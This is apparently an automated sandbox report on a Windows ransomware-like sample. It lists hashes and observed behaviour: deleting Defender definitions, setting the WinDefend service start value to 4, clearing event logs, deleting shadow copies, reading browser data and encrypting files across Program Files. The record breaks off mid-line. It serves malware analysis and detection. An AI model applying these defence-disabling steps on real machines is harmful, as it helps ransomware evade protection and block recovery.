Analysis
-
max time kernel
134s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 14:50
Static task
static1
Behavioral task
behavioral1
Sample
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
-
Size
3.5MB
-
MD5
851a6706bd679387f197f552dae896bc
-
SHA1
ee7d2cf647ee85becd133146b4f600f2fa6965e8
-
SHA256
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b
-
SHA512
ba586db7ec4cc3bf89f2e2ad037f1a36e139f55e125087a3840331bb7d47105cffb2d4e46b154fde07007f0e7b8be202fa76f0eca7636409f3c47484bd081a1e
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1968 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookWideTile.scale-200.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xecd0.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\plugin.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__KAAAACgAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\de-DE\mshwLatin.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rectangle_icon.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-64.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_32x32x32.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\SplashScreen.scale-100.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__FAAAABQAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jce.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__MgAAADIAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookWideTile.scale-150.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-ppd.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__PAAAADwAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPageState2\spider_bp_920.jpg a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\11d.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__KAAAACgAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Eye.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-100.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]_H6p_VnJ5P__DAAAAAwAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\AppxSignature.p7x a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__LAAAACwAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\188.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\orcl7.xsl.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Deal\New-Deal-up.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\5601_24x24x32.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailWideTile.scale-200.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\rofl.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_24x24x32.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\ProjectionCylindric.scale-180.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\91.jpg a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Xaml.Toolkit\Assets\CardsLoadingSpritesheet.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\SmallTile.scale-125.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Outlook.scale-150.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__JAAAACQAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\TellMePowerPoint.nrr.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__CAAAAAgAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msaddsr.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\CherryBlossoms.jpg a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\en-us\styles\wefgallerywinrt.css a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockMedTile.scale-125.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ru_135x40.svg.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\rtscom.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__FgAAABYAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ppd.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6416_40x40x32.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL001.XML.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__GAAAABgAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__OgAAADoAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Classic\classic_10h.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL093.XML.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__CAAAAAgAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Icon.targetsize-48.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-TW.respack a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-100.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close.svg.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2352 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exea235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exepid process 2404 powershell.exe 2404 powershell.exe 2404 powershell.exe 1204 powershell.exe 1204 powershell.exe 1204 powershell.exe 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3412 wevtutil.exe Token: SeBackupPrivilege 3412 wevtutil.exe Token: SeSecurityPrivilege 2104 wevtutil.exe Token: SeBackupPrivilege 2104 wevtutil.exe Token: SeSecurityPrivilege 1156 wevtutil.exe Token: SeBackupPrivilege 1156 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2160 wmic.exe Token: SeSecurityPrivilege 2160 wmic.exe Token: SeTakeOwnershipPrivilege 2160 wmic.exe Token: SeLoadDriverPrivilege 2160 wmic.exe Token: SeSystemProfilePrivilege 2160 wmic.exe Token: SeSystemtimePrivilege 2160 wmic.exe Token: SeProfSingleProcessPrivilege 2160 wmic.exe Token: SeIncBasePriorityPrivilege 2160 wmic.exe Token: SeCreatePagefilePrivilege 2160 wmic.exe Token: SeBackupPrivilege 2160 wmic.exe Token: SeRestorePrivilege 2160 wmic.exe Token: SeShutdownPrivilege 2160 wmic.exe Token: SeDebugPrivilege 2160 wmic.exe Token: SeSystemEnvironmentPrivilege 2160 wmic.exe Token: SeRemoteShutdownPrivilege 2160 wmic.exe Token: SeUndockPrivilege 2160 wmic.exe Token: SeManageVolumePrivilege 2160 wmic.exe Token: 33 2160 wmic.exe Token: 34 2160 wmic.exe Token: 35 2160 wmic.exe Token: 36 2160 wmic.exe Token: SeIncreaseQuotaPrivilege 2748 wmic.exe Token: SeSecurityPrivilege 2748 wmic.exe Token: SeTakeOwnershipPrivilege 2748 wmic.exe Token: SeLoadDriverPrivilege 2748 wmic.exe Token: SeSystemProfilePrivilege 2748 wmic.exe Token: SeSystemtimePrivilege 2748 wmic.exe Token: SeProfSingleProcessPrivilege 2748 wmic.exe Token: SeIncBasePriorityPrivilege 2748 wmic.exe Token: SeCreatePagefilePrivilege 2748 wmic.exe Token: SeBackupPrivilege 2748 wmic.exe Token: SeRestorePrivilege 2748 wmic.exe Token: SeShutdownPrivilege 2748 wmic.exe Token: SeDebugPrivilege 2748 wmic.exe Token: SeSystemEnvironmentPrivilege 2748 wmic.exe Token: SeRemoteShutdownPrivilege 2748 wmic.exe Token: SeUndockPrivilege 2748 wmic.exe Token: SeManageVolumePrivilege 2748 wmic.exe Token: 33 2748 wmic.exe Token: 34 2748 wmic.exe Token: 35 2748 wmic.exe Token: 36 2748 wmic.exe Token: SeIncreaseQuotaPrivilege 2748 wmic.exe Token: SeSecurityPrivilege 2748 wmic.exe Token: SeTakeOwnershipPrivilege 2748 wmic.exe Token: SeLoadDriverPrivilege 2748 wmic.exe Token: SeSystemProfilePrivilege 2748 wmic.exe Token: SeSystemtimePrivilege 2748 wmic.exe Token: SeProfSingleProcessPrivilege 2748 wmic.exe Token: SeIncBasePriorityPrivilege 2748 wmic.exe Token: SeCreatePagefilePrivilege 2748 wmic.exe Token: SeBackupPrivilege 2748 wmic.exe Token: SeRestorePrivilege 2748 wmic.exe Token: SeShutdownPrivilege 2748 wmic.exe Token: SeDebugPrivilege 2748 wmic.exe Token: SeSystemEnvironmentPrivilege 2748 wmic.exe Token: SeRemoteShutdownPrivilege 2748 wmic.exe Token: SeUndockPrivilege 2748 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 860 wrote to memory of 1416 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 1416 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 1416 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1416 wrote to memory of 2904 1416 net.exe net1.exe PID 1416 wrote to memory of 2904 1416 net.exe net1.exe PID 1416 wrote to memory of 2904 1416 net.exe net1.exe PID 860 wrote to memory of 1836 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 1836 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 1836 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1836 wrote to memory of 784 1836 net.exe net1.exe PID 1836 wrote to memory of 784 1836 net.exe net1.exe PID 1836 wrote to memory of 784 1836 net.exe net1.exe PID 860 wrote to memory of 2832 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 2832 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 2832 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 2832 wrote to memory of 2264 2832 net.exe net1.exe PID 2832 wrote to memory of 2264 2832 net.exe net1.exe PID 2832 wrote to memory of 2264 2832 net.exe net1.exe PID 860 wrote to memory of 3392 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 3392 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 3392 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 3392 wrote to memory of 1360 3392 net.exe net1.exe PID 3392 wrote to memory of 1360 3392 net.exe net1.exe PID 3392 wrote to memory of 1360 3392 net.exe net1.exe PID 860 wrote to memory of 2392 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 2392 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 2392 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 2392 wrote to memory of 1348 2392 net.exe net1.exe PID 2392 wrote to memory of 1348 2392 net.exe net1.exe PID 2392 wrote to memory of 1348 2392 net.exe net1.exe PID 860 wrote to memory of 836 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 836 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 836 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 836 wrote to memory of 1848 836 net.exe net1.exe PID 836 wrote to memory of 1848 836 net.exe net1.exe PID 836 wrote to memory of 1848 836 net.exe net1.exe PID 860 wrote to memory of 2344 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 2344 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 2344 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 2344 wrote to memory of 1204 2344 